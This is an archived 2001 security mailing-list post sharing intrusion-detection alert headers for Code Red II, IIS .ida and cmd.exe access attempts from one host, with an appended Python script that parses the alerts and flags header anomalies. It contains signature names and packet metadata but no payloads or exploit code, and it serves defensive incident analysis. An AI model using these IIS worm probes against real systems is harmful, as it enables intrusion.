Hey all,

As a follow-up to what I posted before, here's what I'm seeing from a single host:

1. .ida attempt      dlen=576 length=536 win=5360  TOS=0  TTL=124 Seq=[...]0257 Ack=[...]0956 chksum=58853 ACK
   <identical packet>
2. .ida attempt      dlen=564 length=479 win=6432  TOS=16 TTL=255 Seq=[...]9607 Ack=[...]9607 chksum=55438 ACK-PSH
   <identical packet>
3. coderedII attempt dlen=576 length=536 win=5360  TOS=0  TTL=124 Seq=[...]0793 Ack=[...]0956 chksum=58852 ACK
   <identical packet>
4. coderedII attempt dlen=413 length=373 win=7504  TOS=16 TTL=255 Seq=[...]4487 Ack=[...]3863 chksum=40789 ACK-PSH
   <identical packet>
5. cmd.exe access    dlen=576 length=536 win=5360  TOS=0  TTL=124 Seq=[...]1865 Ack=[...]0956 chksum=58849 ACK
   <identical packet>
6. cmd.exe access    dlen=981 length=941 win=10720 TOS=16 TTL=255 Seq=[...]2071 Ack=[...]4871 chksum=40339 ACK-PSH
   <identical packet>

Note:
- Each "series" is from the same src port.
- Packet #2 has the same seq/ack #s.
- Packet #2 has a strange dlen=564 while length=479.
- The first packet in each attack (#1, #3, #5) is nearly identical, even the ack #.
- Also note window=5360 when length=536 (10x).
- TTLs go from 124->255 between the first and second packets.
- TOS goes from 0->16 between the first and second packets.

The full traces are below. The source is in the same class A as I am (cable modem). Any ideas?
-- 
Brent Deterding

#(1 - 8922) [2001-08-05 19:45:38] [arachNIDS/552] WEB-IIS ISAPI .ida attempt
IPv4: 24.217.103.179 -> 192.168.1.50 hlen=5 TOS=0 dlen=576 ID=54379 flags=0 offset=0 TTL=124 chksum=58853
TCP: port=1894 -> dport: 80 flags=***A**** seq=1997560257 ack=1559690956 off=5 res=0 win=5360 urp=0 chksum=59530
Payload: length = 536
<identical packet to above>

#(1 - 8924) [2001-08-05 19:45:38] [arachNIDS/552] WEB-IIS ISAPI .ida attempt
IPv4: 24.217.103.179 -> 192.168.1.50 hlen=5 TOS=16 dlen=565 ID=0 flags=0 offset=0 TTL=255 chksum=55438
TCP: port=1894 -> dport: 80 flags=***AP*** seq=3243839607 ack=3243839607 off=5 res=0 win=6432 urp=0 chksum=47658
Payload: length = 479
<identical packet to above>

#(1 - 8926) [2001-08-05 19:45:38] CodeRedII Overflow
IPv4: 24.217.103.179 -> 192.168.1.50 hlen=5 TOS=0 dlen=576 ID=54380 flags=0 offset=0 TTL=124 chksum=58852
TCP: port=1894 -> dport: 80 flags=***A**** seq=1997560793 ack=1559690956 off=5 res=0 win=5360 urp=0 chksum=19961
Payload: length = 536
<identical packet to above>

#(1 - 8928) [2001-08-05 19:45:38] CodeRedII Overflow
IPv4: 24.217.103.179 -> 192.168.1.50 hlen=5 TOS=16 dlen=413 ID=0 flags=0 offset=0 TTL=255 chksum=40789
TCP: port=1894 -> dport: 80 flags=***AP*** seq=3462074487 ack=3646623863 off=5 res=0 win=7504 urp=0 chksum=59337
Payload: length = 373
<identical packet to above>

#(1 - 8930) [2001-08-05 19:45:38] WEB-IIS cmd.exe access
IPv4: 24.217.103.179 -> 192.168.1.50 hlen=5 TOS=0 dlen=576 ID=54383 flags=0 offset=0 TTL=124 chksum=58849
TCP: port=1894 -> dport: 80 flags=***A**** seq=1997561865 ack=1559690956 off=5 res=0 win=5360 urp=0 chksum=1862
Payload: length = 536
<identical packet to above>

#(1 - 8932) [2001-08-05 19:45:38] WEB-IIS cmd.exe access
IPv4: 24.217.103.179 -> 192.168.1.50 hlen=5 TOS=16 dlen=981 ID=0 flags=0 offset=0 TTL=255 chksum=40339
TCP: port=1894 -> dport: 80 flags=***AP*** seq=777982071 ack=560074871 off=5 res=0 win=10720 urp=0 chksum=22666
Payload: length = 941
<identical packet to above>

This list is provided by the SecurityFocus ARIS analyzer service. For more information on this free incident handling, management and tracking system please see: http://aris.securityfocus.com
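A triage script, added here as an example and not part of Brent's post, that parses the alert header lines quoted above (copied from the six traces, payload hex left out) and flags the inconsistencies he lists: dlen disagreeing with IP header + TCP header + payload, seq equal to ack, a zero IP ID, a window exactly 10x the payload length, and TTL/TOS changing between alerts that share a source port and signature. The field names and alert format are taken from the traces; nothing else is assumed.

```python
import re
KV = re.compile(r"(\w+)\s*=\s*(\d+)")  # name=number pairs in a header line
SIG = re.compile(r"^#\(\d+ - (\d+)\) \[[^\]]+\] (?:\[[^\]]+\] )?(.+)$")  # alert id and signature name

# Alert headers copied from the six traces in the post (payload hex dumps omitted).
ALERT_TEXT = """\
#(1 - 8922) [2001-08-05 19:45:38] [arachNIDS/552] WEB-IIS ISAPI .ida attempt
IPv4: 24.217.103.179 -> 192.168.1.50 hlen=5 TOS=0 dlen=576 ID=54379 flags=0 offset=0 TTL=124 chksum=58853
TCP: port=1894 -> dport: 80 flags=***A**** seq=1997560257 ack=1559690956 off=5 res=0 win=5360 urp=0 chksum=59530
Payload: length = 536
#(1 - 8924) [2001-08-05 19:45:38] [arachNIDS/552] WEB-IIS ISAPI .ida attempt
IPv4: 24.217.103.179 -> 192.168.1.50 hlen=5 TOS=16 dlen=565 ID=0 flags=0 offset=0 TTL=255 chksum=55438
TCP: port=1894 -> dport: 80 flags=***AP*** seq=3243839607 ack=3243839607 off=5 res=0 win=6432 urp=0 chksum=47658
Payload: length = 479
#(1 - 8926) [2001-08-05 19:45:38] CodeRedII Overflow
IPv4: 24.217.103.179 -> 192.168.1.50 hlen=5 TOS=0 dlen=576 ID=54380 flags=0 offset=0 TTL=124 chksum=58852
TCP: port=1894 -> dport: 80 flags=***A**** seq=1997560793 ack=1559690956 off=5 res=0 win=5360 urp=0 chksum=19961
Payload: length = 536
#(1 - 8928) [2001-08-05 19:45:38] CodeRedII Overflow
IPv4: 24.217.103.179 -> 192.168.1.50 hlen=5 TOS=16 dlen=413 ID=0 flags=0 offset=0 TTL=255 chksum=40789
TCP: port=1894 -> dport: 80 flags=***AP*** seq=3462074487 ack=3646623863 off=5 res=0 win=7504 urp=0 chksum=59337
Payload: length = 373
#(1 - 8930) [2001-08-05 19:45:38] WEB-IIS cmd.exe access
IPv4: 24.217.103.179 -> 192.168.1.50 hlen=5 TOS=0 dlen=576 ID=54383 flags=0 offset=0 TTL=124 chksum=58849
TCP: port=1894 -> dport: 80 flags=***A**** seq=1997561865 ack=1559690956 off=5 res=0 win=5360 urp=0 chksum=1862
Payload: length = 536
#(1 - 8932) [2001-08-05 19:45:38] WEB-IIS cmd.exe access
IPv4: 24.217.103.179 -> 192.168.1.50 hlen=5 TOS=16 dlen=981 ID=0 flags=0 offset=0 TTL=255 chksum=40339
TCP: port=1894 -> dport: 80 flags=***AP*** seq=777982071 ack=560074871 off=5 res=0 win=10720 urp=0 chksum=22666
Payload: length = 941
"""
def parse_alerts(text):
    """One dict of numeric header fields per alert, keyed by the names used in the dump."""
    alerts = []
    for line in text.splitlines():
        m = SIG.match(line)
        if m:
            alerts.append({"id": int(m.group(1)), "sig": m.group(2)})
        else:
            alerts[-1].update((k, int(v)) for k, v in KV.findall(line))
    return alerts

def anomalies(a):
    """Header inconsistencies the post points out, for one parsed alert."""
    expected = 4 * a["hlen"] + 4 * a["off"] + a["length"]  # IP header + TCP header + payload
    checks = [
        (a["dlen"] != expected, f"dlen={a['dlen']} but headers+payload={expected}"),
        (a["seq"] == a["ack"], "seq equals ack"),
        (a["ID"] == 0, "IP ID is 0"),
        (a["win"] == 10 * a["length"], "win is exactly 10x payload length"),
    ]
    return [msg for hit, msg in checks if hit]

def series_changes(alerts):
    """TTL/TOS changes between consecutive alerts sharing a source port and signature."""
    groups = {}
    for a in alerts:
        groups.setdefault((a["port"], a["sig"]), []).append(a)
    return {k: [f"{f} {p[f]}->{n[f]}" for p, n in zip(g, g[1:]) for f in ("TTL", "TOS") if p[f] != n[f]]
            for k, g in groups.items()}
```

Running `anomalies` over each parsed alert singles out the second .ida packet (dlen 565 against 519 bytes of headers plus payload, seq equal to ack) and marks every second packet in a series with ID=0, which is the same split the post describes by hand.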
This archive was generated by hypermail 2b30 : Mon Aug 06 2001 - 11:25:27 PDT